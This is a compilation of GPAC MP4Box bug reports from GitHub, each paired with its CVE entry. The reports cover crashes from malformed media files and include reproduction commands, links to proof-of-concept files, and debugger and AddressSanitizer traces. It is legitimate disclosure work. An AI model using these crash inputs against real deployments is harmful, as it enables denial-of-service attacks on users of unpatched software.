0x0000000000fe3e78 in gf_filter_process_task (task=0x2492f30) at /mnt/data/playground/gpac/src/filter_core/filter.c:2441 #3 0x0000000000f7ab69 in gf_fs_thread_proc (sess_thread=sess_thread@entry=0x248c2b0) at /mnt/data/playground/gpac/src/filter_core/filter_session.c:1640 #4 0x0000000000f927b8 in gf_fs_run (fsess=fsess@entry=0x248c220) at /mnt/data/playground/gpac/src/filter_core/filter_session.c:1877 #5 0x0000000000c17c8b in gf_media_import (importer=importer@entry=0x7fffffff5bf0) at /mnt/data/playground/gpac/src/media_tools/media_import.c:1178 #6 0x0000000000497345 in convert_file_info (inName=0x7fffffffe15b "tmp", trackID=0x0) at /mnt/data/playground/gpac/applications/mp4box/fileimport.c:128 #7 0x0000000000456aaa in mp4boxMain (argc=<optimized out>, argv=<optimized out>) at /mnt/data/playground/gpac/applications/mp4box/main.c:5925 #8 0x0000000001f06976 in generic_start_main () #9 0x0000000001f06f65 in __libc_start_main () #10 0x000000000041c4e9 in _start () ~~~~ Here is the trace reported by ASAN: ~~~~ ==29762==ERROR: AddressSanitizer: negative-size-param: (size=-1) #0 0x7fdaf42ff813 (/usr/lib/x86_64-linux-gnu/libasan.so.4+0x79813) #1 0x7fdaf2897f1c in memcpy /usr/include/x86_64-linux-gnu/bits/string_fortified.h:34 #2 0x7fdaf2897f1c in mpgviddmx_process /playground/gpac/src/filters/reframe_mpgvid.c:643 #3 0x7fdaf254efa0 in gf_filter_process_task /playground/gpac/src/filter_core/filter.c:2441 #4 0x7fdaf250f0e2 in gf_fs_thread_proc /playground/gpac/src/filter_core/filter_session.c:1640 #5 0x7fdaf2519fb0 in gf_fs_run /playground/gpac/src/filter_core/filter_session.c:1877 #6 0x7fdaf1ff21f5 in gf_media_import /playground/gpac/src/media_tools/media_import.c:1178 #7 0x55ce40c3484f in convert_file_info /playground/gpac/applications/mp4box/fileimport.c:128 #8 0x55ce40c07635 in mp4boxMain /playground/gpac/applications/mp4box/main.c:5925 #9 0x7fdaef9a6bf6 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x21bf6) #10 0x55ce40be83f9 in _start (/playground/gpac/build-a/bin/gcc/MP4Box+0x873f9) 0x622000007489 is located 0 bytes to the right of 5001-byte region [0x622000006100,0x622000007489) allocated by thread T0 here: #0 0x7fdaf4364b40 in __interceptor_malloc (/usr/lib/x86_64-linux-gnu/libasan.so.4+0xdeb40) #1 0x7fdaf26a0289 in filein_initialize /playground/gpac/src/filters/in_file.c:193 #2 0x7fdaf253b0f0 in gf_filter_new_finalize /playground/gpac/src/filter_core/filter.c:425 #3 0x7fdaf253f294 in gf_filter_new /playground/gpac/src/filter_core/filter.c:382 #4 0x7fdaf2519310 in gf_fs_load_source_dest_internal /playground/gpac/src/filter_core/filter_session.c:2833 #5 0x7fdaf2524a82 in gf_fs_load_source /playground/gpac/src/filter_core/filter_session.c:2873 #6 0x7fdaf1ff21a6 in gf_media_import /playground/gpac/src/media_tools/media_import.c:1165 #7 0x55ce40c3484f in convert_file_info /playground/gpac/applications/mp4box/fileimport.c:128 #8 0x55ce40c07635 in mp4boxMain /playground/gpac/applications/mp4box/main.c:5925 #9 0x7fdaef9a6bf6 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x21bf6) SUMMARY: AddressSanitizer: negative-size-param (/usr/lib/x86_64-linux-gnu/libasan.so.4+0x79813) ==29762==ABORTING ~~~~

Segmentation fault casued by null pointer dereference using mp4box in mpgviddmx_process, reframe_mpgvid.c:643

https://api.github.com/repos/gpac/gpac/issues/1905/comments

2021-09-01T06:02:21Z

2021-09-01T12:04:16Z

https://github.com/gpac/gpac/issues/1905

CVE-2021-40576

2022-01-13T19:15:08.407

The binary MP4Box in Gpac 1.0.1 has a null pointer dereference vulnerability in the gf_isom_get_payt_count function in hint_track.c, which allows attackers to cause a denial of service.

https://github.com/gpac/gpac/issues/1904

github.com

- [x] I looked for a similar issue and couldn't find any. - [x] I tried with the latest version of GPAC. Installers available at http://gpac.io/downloads/gpac-nightly-builds/ - [x] I give enough information for contributors to reproduce my issue (meaningful title, github labels, platform and compiler, command-line ...). Hi, there. There is a segmentation fault caused by null pointer dereference in gf_isom_get_payt_count, hint_track.c:990 in commit d003a572d57. Here is my environment, compiler info and gpac version: ~~~~ Distributor ID: Ubuntu Description: Ubuntu 16.04.6 LTS Release: 16.04 Codename: xenial gcc: 5.4.0 MP4Box - GPAC version 1.1.0-DEV-rev1191-g55d6dbc-master (c) 2000-2021 Telecom Paris distributed under LGPL v2.1+ - http://gpac.io MINI build (encoders, decoders, audio and video output disabled) Please cite our work in your research: GPAC Filters: https://doi.org/10.1145/3339825.3394929 GPAC: https://doi.org/10.1145/1291233.1291452 GPAC Configuration: --static-bin --enable-debug Features: GPAC_CONFIG_LINUX GPAC_64_BITS GPAC_HAS_SOCK_UN GPAC_MINIMAL_ODF GPAC_HAS_QJS GPAC_HAS_FREETYPE GPAC_HAS_JPEG GPAC_HAS_PNG GPAC_DISABLE_3D ~~~~ To reproduce, run ~~~~ ./MP4Box -info poc ~~~~ POC: [poc.zip](https://github.com/gpac/gpac/files/7083766/mp4box-seg-npd_gf_isom_get_payt_count990.zip) (unzip first) Here is the trace reported by gdb: ~~~~ Stopped reason: SIGSEGV gef➤ bt #0 0x0000000000ab4f30 in gf_isom_get_payt_count (the_file=the_file@entry=0x248c220, trackNumber=trackNumber@entry=0x4) at /mnt/data/playground/gpac/src/isomedia/hint_track.c:990 #1 0x0000000000490533 in DumpTrackInfo (file=file@entry=0x248c220, trackID=0x6, trackID@entry=0x4, full_dump=full_dump@entry=GF_FALSE, is_track_num=is_track_num@entry=GF_TRUE, dump_m4sys=dump_m4sys@entry=GF_TRUE) at /mnt/data/playground/gpac/applications/mp4box/filedump.c:3178 #2 0x0000000000491d78 in DumpMovieInfo (file=0x248c220, full_dump=GF_FALSE) at /mnt/data/playground/gpac/applications/mp4box/filedump.c:3789 #3 0x0000000000456587 in mp4boxMain (argc=<optimized out>, argv=<optimized out>) at /mnt/data/playground/gpac/applications/mp4box/main.c:6023 #4 0x0000000001f06976 in generic_start_main () #5 0x0000000001f06f65 in __libc_start_main () #6 0x000000000041c4e9 in _start () ~~~~

Segmentation fault caused by null pointer dereference using mp4box in gf_isom_get_payt_count, hint_track.c:990

https://api.github.com/repos/gpac/gpac/issues/1904/comments

2021-08-31T12:13:57Z

2021-09-01T12:04:15Z

https://github.com/gpac/gpac/issues/1904

CVE-2021-45760

2022-01-14T00:15:07.767

GPAC v1.1.0 was discovered to contain an invalid memory address dereference via the function gf_list_last(). This vulnerability allows attackers to cause a Denial of Service (DoS).

https://github.com/gpac/gpac/issues/1966

github.com

Thanks for reporting your issue. Please make sure these boxes are checked before submitting your issue - thank you! - [x] I looked for a similar issue and couldn't find any. - [x] I tried with the latest version of GPAC. Installers available at http://gpac.io/downloads/gpac-nightly-builds/ - [x] I give enough information for contributors to reproduce my issue (meaningful title, github labels, platform and compiler, command-line ...). I can share files anonymously with this dropbox: https://www.mediafire.com/filedrop/filedrop_hosted.php?drop=eec9e058a9486fe4e99c33021481d9e1826ca9dbc242a6cfaab0fe95da5e5d95 Detailed guidelines: http://gpac.io/2013/07/16/how-to-file-a-bug-properly/ An invalid memory address dereference was discovered in dump_od_to_saf.isra(). The vulnerability causes a segmentation fault and application crash. **Version:** ``` MP4Box - GPAC version 1.1.0-DEV-revUNKNOWN_REV (c) 2000-2021 Telecom Paris distributed under LGPL v2.1+ - http://gpac.io Please cite our work in your research: GPAC Filters: https://doi.org/10.1145/3339825.3394929 GPAC: https://doi.org/10.1145/1291233.1291452 GPAC Configuration: Features: GPAC_CONFIG_LINUX GPAC_64_BITS GPAC_HAS_IPV6 GPAC_HAS_SOCK_UN GPAC_MINIMAL_ODF GPAC_HAS_QJS GPAC_HAS_JPEG GPAC_HAS_PNG GPAC_HAS_LINUX_DVB GPAC_DISABLE_3D ``` **System information** Ubuntu 20.04 focal, AMD EPYC 7742 64-Core @ 16x 2.25GHz **command:** ``` ./MP4Box -lsr poc_3 ``` [poc_3.zip](https://github.com/gpac/gpac/files/7692204/poc_3.zip) **Result** ``` [ODF] Not enough bytes (38) to read descriptor (size=59) [ODF] Error reading descriptor (tag 4 size 49): Invalid MPEG-4 Descriptor [iso file] extra box maxr found in hinf, deleting [iso file] extra box maxr found in hinf, deleting [iso file] Incomplete box mdat - start 11495 size 861263 [iso file] Incomplete file while reading for dump - aborting parsing [ODF] Not enough bytes (38) to read descriptor (size=59) [ODF] Error reading descriptor (tag 4 size 49): Invalid MPEG-4 Descriptor [iso file] extra box maxr found in hinf, deleting [iso file] extra box maxr found in hinf, deleting [iso file] Incomplete box mdat - start 11495 size 861263 [iso file] Incomplete file while reading for dump - aborting parsing MPEG-4 BIFS Scene Parsing Scene loaded - dumping 2 systems streams [1] 1390552 segmentation fault ./MP4Box -lsr ./poc/poc_3 ``` **gdb** ``` Program received signal SIGSEGV, Segmentation fault. 0x00007ffff7ab7e3b in dump_od_to_saf.isra () from /root/fuckit/test/gpac1210/bin/gcc/libgpac.so.10 LEGEND: STACK | HEAP | CODE | DATA | RWX | RODATA ────────────────────────────────────────────[ REGISTERS ]───────────────────────────────────────────── RAX 0x0 RBX 0x5555555df630 —▸ 0x5555555df601 ◂— 0x2100000000000000 RCX 0x0 RDX 0x7ffff72bf040 ◂— 0x7ffff72bf040 RDI 0x5555555e0400 ◂— 0xfbad2c84 RSI 0x5555555df440 ◂— 0x7 R8 0x0 R9 0x23 R10 0x7ffff7e4690b ◂— 0x7473200000000022 /* '"' */ R11 0x7fffffff70c7 ◂— 0x4d0552ab398a0031 /* '1' */ R12 0x0 R13 0x5555555df4d0 ◂— 0x0 R14 0x5555555df070 —▸ 0x5555555e0400 ◂— 0xfbad2c84 R15 0x5555555dfcb0 ◂— 0x700010003 RBP 0x1 RSP 0x7fffffff7200 —▸ 0x5555555df8a0 ◂— 0xc0 RIP 0x7ffff7ab7e3b (dump_od_to_saf.isra+299) ◂— movzx edx, byte ptr [rax + 8] ──────────────────────────────────────────────[ DISASM ]────────────────────────────────────────────── ► 0x7ffff7ab7e3b <dump_od_to_saf.isra+299> movzx edx, byte ptr [rax + 8] 0x7ffff7ab7e3f <dump_od_to_saf.isra+303> mov ecx, dword ptr [rax + 4] 0x7ffff7ab7e42 <dump_od_to_saf.isra+306> xor eax, eax 0x7ffff7ab7e44 <dump_od_to_saf.isra+308> mov r8d, dword ptr [rsi + 0x18] 0x7ffff7ab7e48 <dump_od_to_saf.isra+312> lea rsi, [rip + 0x38eac1] 0x7ffff7ab7e4f <dump_od_to_saf.isra+319> call gf_fprintf@plt <gf_fprintf@plt> 0x7ffff7ab7e54 <dump_od_to_saf.isra+324> mov rdx, qword ptr [r13] 0x7ffff7ab7e58 <dump_od_to_saf.isra+328> mov r9, qword ptr [rsp] 0x7ffff7ab7e5c <dump_od_to_saf.isra+332> test rdx, rdx 0x7ffff7ab7e5f <dump_od_to_saf.isra+335> jne dump_od_to_saf.isra+464 <dump_od_to_saf.isra+464> 0x7ffff7ab7e61 <dump_od_to_saf.isra+337> mov rdi, qword ptr [r14] ──────────────────────────────────────────────[ STACK ]─────────────────────────────────────────────── 00:0000│ rsp 0x7fffffff7200 —▸ 0x5555555df8a0 ◂— 0xc0 01:0008│ 0x7fffffff7208 ◂— 0x100000002 02:0010│ 0x7fffffff7210 —▸ 0x5555555dfa50 —▸ 0x5555555dfde0 ◂— 0x0 03:0018│ 0x7fffffff7218 ◂— 0x0 04:0020│ 0x7fffffff7220 —▸ 0x5555555dfa50 —▸ 0x5555555dfde0 ◂— 0x0 05:0028│ 0x7fffffff7228 ◂— 0x0 06:0030│ 0x7fffffff7230 ◂— 0x0 07:0038│ 0x7fffffff7238 —▸ 0x5555555df4d0 ◂— 0x0 ────────────────────────────────────────────[ BACKTRACE ]───────────────────────────────────────────── ► f 0 0x7ffff7ab7e3b dump_od_to_saf.isra+299 f 1 0x7ffff7ac282d gf_sm_dump+1853 f 2 0x555555584418 dump_isom_scene+616 f 3 0x55555557b42c mp4boxMain+9228 f 4 0x7ffff75630b3 __libc_start_main+243 ────────────────────────────────────────────────────────────────────────────────────────────────────── pwndbg> bt #0 0x00007ffff7ab7e3b in dump_od_to_saf.isra () from /root/fuckit/test/gpac1210/bin/gcc/libgpac.so.10 #1 0x00007ffff7ac282d in gf_sm_dump () from /root/fuckit/test/gpac1210/bin/gcc/libgpac.so.10 #2 0x0000555555584418 in dump_isom_scene () #3 0x000055555557b42c in mp4boxMain () #4 0x00007ffff75630b3 in __libc_start_main (main=0x55555556c420 <main>, argc=3, argv=0x7fffffffe188, init=<optimized out>, fini=<optimized out>, rtld_fini=<optimized out>, stack_end=0x7fffffffe178) at ../csu/libc-start.c:308 #5 0x000055555556c45e in _start () ```

Invalid memory address dereference in dump_od_to_saf.isra()

https://api.github.com/repos/gpac/gpac/issues/1966/comments

2021-12-10T11:00:37Z

2021-12-13T13:22:06Z

https://github.com/gpac/gpac/issues/1966

CVE-2021-45762

2022-01-14T19:15:08.027

GPAC v1.1.0 was discovered to contain an invalid memory address dereference via the function gf_sg_vrml_mf_reset(). This vulnerability allows attackers to cause a Denial of Service (DoS).

https://github.com/gpac/gpac/issues/1978

github.com

Thanks for reporting your issue. Please make sure these boxes are checked before submitting your issue - thank you! - [x] I looked for a similar issue and couldn't find any. - [x] I tried with the latest version of GPAC. Installers available at http://gpac.io/downloads/gpac-nightly-builds/ - [x] I give enough information for contributors to reproduce my issue (meaningful title, github labels, platform and compiler, command-line ...). I can share files anonymously with this dropbox: https://www.mediafire.com/filedrop/filedrop_hosted.php?drop=eec9e058a9486fe4e99c33021481d9e1826ca9dbc242a6cfaab0fe95da5e5d95 Detailed guidelines: http://gpac.io/2013/07/16/how-to-file-a-bug-properly/ An invalid memory address dereference was discovered in gf_sg_vrml_mf_reset(). The vulnerability causes a segmentation fault and application crash. **Version:** ``` MP4Box - GPAC version 1.1.0-DEV-revUNKNOWN_REV (c) 2000-2021 Telecom Paris distributed under LGPL v2.1+ - http://gpac.io Please cite our work in your research: GPAC Filters: https://doi.org/10.1145/3339825.3394929 GPAC: https://doi.org/10.1145/1291233.1291452 GPAC Configuration: Features: GPAC_CONFIG_LINUX GPAC_64_BITS GPAC_HAS_IPV6 GPAC_HAS_SOCK_UN GPAC_MINIMAL_ODF GPAC_HAS_QJS GPAC_HAS_JPEG GPAC_HAS_PNG GPAC_HAS_LINUX_DVB GPAC_DISABLE_3D ``` **System information** Ubuntu 20.04 focal, AMD EPYC 7742 64-Core @ 16x 2.25GHz **command:** ``` ./MP4Box -lsr poc_14 ``` [poc_14.zip](https://github.com/gpac/gpac/files/7696722/poc_14.zip) **Result** ``` ./MP4Box -lsr ./poc/poc_14 [iso file] Box "stco" (start 2057) has 6144 extra bytes [iso file] Box "stco" is larger than container box [iso file] Box "stbl" size 1814 (start 415) invalid (read 7894) [iso file] Unknown box type 00040000 in parent dref [iso file] extra box maxr found in hinf, deleting [iso file] Box "stss" (start 9939) has 32 extra bytes [iso file] extra box maxr found in hinf, deleting [iso file] Track with no sample description box ! [iso file] Incomplete box mdat - start 11495 size 859244 [iso file] Incomplete file while reading for dump - aborting parsing [iso file] Box "stco" (start 2057) has 6144 extra bytes [iso file] Box "stco" is larger than container box [iso file] Box "stbl" size 1814 (start 415) invalid (read 7894) [iso file] Unknown box type 00040000 in parent dref [iso file] extra box maxr found in hinf, deleting [iso file] Box "stss" (start 9939) has 32 extra bytes [iso file] extra box maxr found in hinf, deleting [iso file] Track with no sample description box ! [iso file] Incomplete box mdat - start 11495 size 859244 [iso file] Incomplete file while reading for dump - aborting parsing MPEG-4 BIFS Scene Parsing [1] 250723 segmentation fault ./MP4Box -lsr ./poc/poc_14 ``` **gdb** ``` Program received signal SIGSEGV, Segmentation fault. 0x00007ffff78a0d66 in gf_sg_vrml_mf_reset () from /root/fuckit/test/gpac1210/bin/gcc/libgpac.so.10 LEGEND: STACK | HEAP | CODE | DATA | RWX | RODATA ───────────────────────────────[ REGISTERS ]──────────────────────────────── RAX 0x0 RBX 0x0 RCX 0x7fffffff6160 ◂— 0x3f00000004 RDX 0x8 RDI 0x0 RSI 0x3f R8 0x0 R9 0x0 R10 0x7ffff775c1f5 ◂— 'gf_sg_script_field_get_info' R11 0x7ffff788f770 (gf_sg_script_field_get_info) ◂— endbr64 R12 0x7fffffff6160 ◂— 0x3f00000004 R13 0x5555555deb80 ◂— 0x0 R14 0x5555555dfbb0 —▸ 0x5555555dfbe0 ◂— 0x100000051 /* 'Q' */ R15 0x1d61 RBP 0x5555555d5d60 ◂— 0x0 RSP 0x7fffffff6118 —▸ 0x7ffff790fbe2 (gf_bifs_dec_field+130) ◂— mov r15d, eax RIP 0x7ffff78a0d66 (gf_sg_vrml_mf_reset+6) ◂— cmp qword ptr [rdi + 8], 0 ───────────────────────────────────────[ DISASM ]──────────────────────────────────────── ► 0x7ffff78a0d66 <gf_sg_vrml_mf_reset+6> cmp qword ptr [rdi + 8], 0 0x7ffff78a0d6b <gf_sg_vrml_mf_reset+11> je gf_sg_vrml_mf_reset+144 <gf_sg_vrml_mf_reset+144> ↓ 0x7ffff78a0df0 <gf_sg_vrml_mf_reset+144> ret 0x7ffff78a0df1 <gf_sg_vrml_mf_reset+145> nop dword ptr [rax] 0x7ffff78a0df8 <gf_sg_vrml_mf_reset+152> mov eax, dword ptr [rbp] 0x7ffff78a0dfb <gf_sg_vrml_mf_reset+155> mov r13, qword ptr [rbp + 8] 0x7ffff78a0dff <gf_sg_vrml_mf_reset+159> test eax, eax 0x7ffff78a0e01 <gf_sg_vrml_mf_reset+161> je gf_sg_vrml_mf_reset+198 <gf_sg_vrml_mf_reset+198> ↓ 0x7ffff78a0e26 <gf_sg_vrml_mf_reset+198> mov rdi, r13 0x7ffff78a0e29 <gf_sg_vrml_mf_reset+201> call gf_free@plt <gf_free@plt> 0x7ffff78a0e2e <gf_sg_vrml_mf_reset+206> jmp gf_sg_vrml_mf_reset+100 <gf_sg_vrml_mf_reset+100> ────────────────────────────────────────[ STACK ]──────────────────────────────────────── 00:0000│ rsp 0x7fffffff6118 —▸ 0x7ffff790fbe2 (gf_bifs_dec_field+130) ◂— mov r15d, eax 01:0008│ 0x7fffffff6120 —▸ 0x7fffffff65b0 —▸ 0x5555555dfbb0 —▸ 0x5555555dfbe0 ◂— 0x100000051 /* 'Q' */ 02:0010│ 0x7fffffff6128 —▸ 0x7fffffff65b0 —▸ 0x5555555dfbb0 —▸ 0x5555555dfbe0 ◂— 0x100000051 /* 'Q' */ 03:0018│ 0x7fffffff6130 ◂— 0x0 04:0020│ 0x7fffffff6138 —▸ 0x5555555e0210 ◂— 0x3f00000000 05:0028│ 0x7fffffff6140 —▸ 0x7fffffff6160 ◂— 0x3f00000004 06:0030│ 0x7fffffff6148 —▸ 0x7fffffff65b0 —▸ 0x5555555dfbb0 —▸ 0x5555555dfbe0 ◂— 0x100000051 /* 'Q' */ 07:0038│ 0x7fffffff6150 ◂— 0x1d61 ──────────────────────────────────────[ BACKTRACE ]────────────────────────────────────── ► f 0 0x7ffff78a0d66 gf_sg_vrml_mf_reset+6 f 1 0x7ffff790fbe2 gf_bifs_dec_field+130 f 2 0x7ffff7916f02 ParseScriptField+274 f 3 0x7ffff7919c50 SFScript_Parse+1056 f 4 0x7ffff790eb3c gf_bifs_dec_sf_field+1548 f 5 0x7ffff790eff2 BD_DecMFFieldList+242 f 6 0x7ffff790fac5 gf_bifs_dec_node_mask+421 f 7 0x7ffff790e158 gf_bifs_dec_node+936 ───────────────────────────────────────────────────────────────────────────────────────── pwndbg> bt #0 0x00007ffff78a0d66 in gf_sg_vrml_mf_reset () from /root/fuckit/test/gpac1210/bin/gcc/libgpac.so.10 #1 0x00007ffff790fbe2 in gf_bifs_dec_field () from /root/fuckit/test/gpac1210/bin/gcc/libgpac.so.10 #2 0x00007ffff7916f02 in ParseScriptField () from /root/fuckit/test/gpac1210/bin/gcc/libgpac.so.10 #3 0x00007ffff7919c50 in SFScript_Parse () from /root/fuckit/test/gpac1210/bin/gcc/libgpac.so.10 #4 0x00007ffff790eb3c in gf_bifs_dec_sf_field () from /root/fuckit/test/gpac1210/bin/gcc/libgpac.so.10 #5 0x00007ffff790eff2 in BD_DecMFFieldList () from /root/fuckit/test/gpac1210/bin/gcc/libgpac.so.10 #6 0x00007ffff790fac5 in gf_bifs_dec_node_mask () from /root/fuckit/test/gpac1210/bin/gcc/libgpac.so.10 #7 0x00007ffff790e158 in gf_bifs_dec_node () from /root/fuckit/test/gpac1210/bin/gcc/libgpac.so.10 #8 0x00007ffff790f3b4 in BD_DecMFFieldVec () from /root/fuckit/test/gpac1210/bin/gcc/libgpac.so.10 #9 0x00007ffff790f7f7 in gf_bifs_dec_node_list () from /root/fuckit/test/gpac1210/bin/gcc/libgpac.so.10 #10 0x00007ffff790e066 in gf_bifs_dec_node () from /root/fuckit/test/gpac1210/bin/gcc/libgpac.so.10 #11 0x00007ffff7906580 in BD_DecSceneReplace () from /root/fuckit/test/gpac1210/bin/gcc/libgpac.so.10 #12 0x00007ffff7914e5e in BM_SceneReplace () from /root/fuckit/test/gpac1210/bin/gcc/libgpac.so.10 #13 0x00007ffff7915023 in BM_ParseCommand () from /root/fuckit/test/gpac1210/bin/gcc/libgpac.so.10 #14 0x00007ffff7915353 in gf_bifs_decode_command_list () from /root/fuckit/test/gpac1210/bin/gcc/libgpac.so.10 #15 0x00007ffff7aa1d91 in gf_sm_load_run_isom () from /root/fuckit/test/gpac1210/bin/gcc/libgpac.so.10 #16 0x00005555555844a8 in dump_isom_scene () #17 0x000055555557b42c in mp4boxMain () #18 0x00007ffff75630b3 in __libc_start_main (main=0x55555556c420 <main>, argc=3, argv=0x7fffffffe208, init=<optimized out>, fini=<optimized out>, rtld_fini=<optimized out>, stack_end=0x7fffffffe1f8) at ../csu/libc-start.c:308 #19 0x000055555556c45e in _start () ```

Invalid memory address dereference in gf_sg_vrml_mf_reset()

https://api.github.com/repos/gpac/gpac/issues/1978/comments

2021-12-11T09:10:17Z

2021-12-13T13:22:09Z

https://github.com/gpac/gpac/issues/1978

CVE-2021-45763

2022-01-14T19:15:08.077

GPAC v1.1.0 was discovered to contain an invalid call in the function gf_node_changed(). This vulnerability can lead to a Denial of Service (DoS).

https://github.com/gpac/gpac/issues/1974

github.com

Thanks for reporting your issue. Please make sure these boxes are checked before submitting your issue - thank you! - [x] I looked for a similar issue and couldn't find any. - [x] I tried with the latest version of GPAC. Installers available at http://gpac.io/downloads/gpac-nightly-builds/ - [x] I give enough information for contributors to reproduce my issue (meaningful title, github labels, platform and compiler, command-line ...). I can share files anonymously with this dropbox: https://www.mediafire.com/filedrop/filedrop_hosted.php?drop=eec9e058a9486fe4e99c33021481d9e1826ca9dbc242a6cfaab0fe95da5e5d95 Detailed guidelines: http://gpac.io/2013/07/16/how-to-file-a-bug-properly/ An invalid call was discovered in gf_node_changed(). The vulnerability causes a segmentation fault and application crash. **Version:** ``` MP4Box - GPAC version 1.1.0-DEV-revUNKNOWN_REV (c) 2000-2021 Telecom Paris distributed under LGPL v2.1+ - http://gpac.io Please cite our work in your research: GPAC Filters: https://doi.org/10.1145/3339825.3394929 GPAC: https://doi.org/10.1145/1291233.1291452 GPAC Configuration: Features: GPAC_CONFIG_LINUX GPAC_64_BITS GPAC_HAS_IPV6 GPAC_HAS_SOCK_UN GPAC_MINIMAL_ODF GPAC_HAS_QJS GPAC_HAS_JPEG GPAC_HAS_PNG GPAC_HAS_LINUX_DVB GPAC_DISABLE_3D ``` **System information** Ubuntu 20.04 focal, AMD EPYC 7742 64-Core @ 16x 2.25GHz **command:** ``` ./MP4Box -bt ./poc/poc_11 ``` [poc_11.zip](https://github.com/gpac/gpac/files/7696151/poc_11.zip) **Result** ``` ./MP4Box -bt ./poc/poc_10 [iso file] extra box maxr found in hinf, deleting [iso file] Unknown box type traI in parent moov [iso file] Box "stss" (start 9939) has 32 extra bytes [iso file] extra box maxr found in hinf, deleting [iso file] Track with no sample description box ! [iso file] Incomplete box mdat - start 11495 size 861261 [iso file] Incomplete file while reading for dump - aborting parsing [iso file] extra box maxr found in hinf, deleting [iso file] Unknown box type traI in parent moov [iso file] Box "stss" (start 9939) has 32 extra bytes [iso file] extra box maxr found in hinf, deleting [iso file] Track with no sample description box ! [iso file] Incomplete box mdat - start 11495 size 861261 [iso file] Incomplete file while reading for dump - aborting parsing MPEG-4 BIFS Scene Parsing [1] 1142870 segmentation fault ./MP4Box -bt ./poc/poc_10 ``` **gdb** ``` Program received signal SIGSEGV, Segmentation fault. 0x0000000000000001 in ?? () LEGEND: STACK | HEAP | CODE | DATA | RWX | RODATA ────────────────────────────────────────────[ REGISTERS ]───────────────────────────────────────────── RAX 0x1 RBX 0x7fffffff6bc0 ◂— 0x0 RCX 0x7fffffff6bc0 ◂— 0x0 RDX 0x5555555e6230 —▸ 0x5555555e6270 ◂— 0x0 RDI 0x0 RSI 0x1 R8 0x0 R9 0x0 R10 0x7ffff775ba62 ◂— 'gf_node_changed' R11 0x7ffff784a0f0 (gf_node_changed) ◂— endbr64 R12 0x5555555c6010 ◂— 0x200000002 R13 0x5555555e5100 ◂— 0x0 R14 0x5555555e6230 —▸ 0x5555555e6270 ◂— 0x0 R15 0x7fffffff6bc0 ◂— 0x0 RBP 0x5555555e6230 —▸ 0x5555555e6270 ◂— 0x0 RSP 0x7fffffff6a88 —▸ 0x7ffff784a1ca (gf_node_changed+218) ◂— test rbx, rbx RIP 0x1 ──────────────────────────────────────────────[ DISASM ]────────────────────────────────────────────── Invalid address 0x1 ──────────────────────────────────────────────[ STACK ]─────────────────────────────────────────────── 00:0000│ rsp 0x7fffffff6a88 —▸ 0x7ffff784a1ca (gf_node_changed+218) ◂— test rbx, rbx 01:0008│ 0x7fffffff6a90 ◂— 0x0 ... ↓ 3 skipped 05:0028│ 0x7fffffff6ab0 ◂— 0x7374636f /* 'octs' */ 06:0030│ 0x7fffffff6ab8 —▸ 0x5555555e4fd0 ◂— 0x7374636f /* 'octs' */ 07:0038│ 0x7fffffff6ac0 ◂— 0x2 ────────────────────────────────────────────[ BACKTRACE ]───────────────────────────────────────────── ► f 0 0x1 f 1 0x7ffff784a1ca gf_node_changed+218 f 2 0x7ffff784b675 gf_sg_reset+805 f 3 0x7ffff784ba47 gf_sg_del+55 f 4 0x7ffff788b7f8 gf_sg_proto_del+424 f 5 0x7ffff7905f88 gf_bifs_dec_proto_list+680 f 6 0x7ffff7913a11 BM_ParseInsert+769 f 7 0x7ffff7914fe1 BM_ParseCommand+113 ────────────────────────────────────────────────────────────────────────────────────────────────────── pwndbg> bt #0 0x0000000000000001 in ?? () #1 0x00007ffff784a1ca in gf_node_changed () from /root/fuckit/test/gpac1210/bin/gcc/libgpac.so.10 #2 0x00007ffff784b675 in gf_sg_reset () from /root/fuckit/test/gpac1210/bin/gcc/libgpac.so.10 #3 0x00007ffff784ba47 in gf_sg_del () from /root/fuckit/test/gpac1210/bin/gcc/libgpac.so.10 #4 0x00007ffff788b7f8 in gf_sg_proto_del () from /root/fuckit/test/gpac1210/bin/gcc/libgpac.so.10 #5 0x00007ffff7905f88 in gf_bifs_dec_proto_list () from /root/fuckit/test/gpac1210/bin/gcc/libgpac.so.10 #6 0x00007ffff7913a11 in BM_ParseInsert () from /root/fuckit/test/gpac1210/bin/gcc/libgpac.so.10 #7 0x00007ffff7914fe1 in BM_ParseCommand () from /root/fuckit/test/gpac1210/bin/gcc/libgpac.so.10 #8 0x00007ffff7915353 in gf_bifs_decode_command_list () from /root/fuckit/test/gpac1210/bin/gcc/libgpac.so.10 #9 0x00007ffff7aa1d91 in gf_sm_load_run_isom () from /root/fuckit/test/gpac1210/bin/gcc/libgpac.so.10 #10 0x00005555555844a8 in dump_isom_scene () #11 0x000055555557b42c in mp4boxMain () #12 0x00007ffff75630b3 in __libc_start_main (main=0x55555556c420 <main>, argc=3, argv=0x7fffffffe1b8, init=<optimized out>, fini=<optimized out>, rtld_fini=<optimized out>, stack_end=0x7fffffffe1a8) at ../csu/libc-start.c:308 #13 0x000055555556c45e in _start () ``` `break gf_node_changed` ``` pwndbg> 0x00007ffff784a1c8 in gf_node_changed () from /root/fuckit/test/gpac1210/bin/gcc/libgpac.so.10 LEGEND: STACK | HEAP | CODE | DATA | RWX | RODATA ────────────────────────────────────────────[ REGISTERS ]───────────────────────────────────────────── RAX 0x1 RBX 0x7fffffff6bc0 ◂— 0x0 RCX 0x7fffffff6bc0 ◂— 0x0 RDX 0x5555555e6230 —▸ 0x5555555e6270 ◂— 0x0 RDI 0x0 *RSI 0x1 R8 0x0 R9 0x0 R10 0x7ffff775ba62 ◂— 'gf_node_changed' R11 0x7ffff784a0f0 (gf_node_changed) ◂— endbr64 R12 0x5555555c6010 ◂— 0x200000002 R13 0x5555555e5100 ◂— 0x0 R14 0x5555555e6230 —▸ 0x5555555e6270 ◂— 0x0 R15 0x7fffffff6bc0 ◂— 0x0 RBP 0x5555555e6230 —▸ 0x5555555e6270 ◂— 0x0 RSP 0x7fffffff6a90 ◂— 0x0 *RIP 0x7ffff784a1c8 (gf_node_changed+216) ◂— call rax ──────────────────────────────────────────────[ DISASM ]────────────────────────────────────────────── 0x7ffff784a1b6 <gf_node_changed+198> je gf_node_changed+223 <gf_node_changed+223> 0x7ffff784a1b8 <gf_node_changed+200> mov rdi, qword ptr [r12 + 0x28] 0x7ffff784a1bd <gf_node_changed+205> mov rcx, rbx 0x7ffff784a1c0 <gf_node_changed+208> mov rdx, rbp 0x7ffff784a1c3 <gf_node_changed+211> mov esi, 1 ► 0x7ffff784a1c8 <gf_node_changed+216> call rax <1> 0x7ffff784a1ca 